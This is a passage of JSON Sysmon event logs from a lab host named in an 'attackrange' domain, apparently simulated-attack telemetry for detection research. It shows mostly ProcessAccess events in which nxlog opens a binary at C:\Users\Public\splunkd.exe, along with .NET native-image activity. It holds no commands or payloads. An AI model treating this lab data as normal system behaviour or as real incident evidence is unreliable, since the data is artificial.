C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:34.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:35.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:35.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:36.654\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:36.654","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:37.669\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:37.669","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:38.107\r\nProcessGuid: {E2A3D6B1-134E-5F25-0000-0010150A0E00}\r\nProcessId: 4440\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1158-0\\System.Activities.Presentation.dll\r\nCreationUtcTime: 2020-08-01 07:01:38.107","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:38.107","ProcessGuid":"{E2A3D6B1-134E-5F25-0000-0010150A0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1158-0\\System.Activities.Presentation.dll","CreationUtcTime":"2020-08-01 07:01:38.107","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.232\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.232","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.232\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.232","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.232\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.232","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C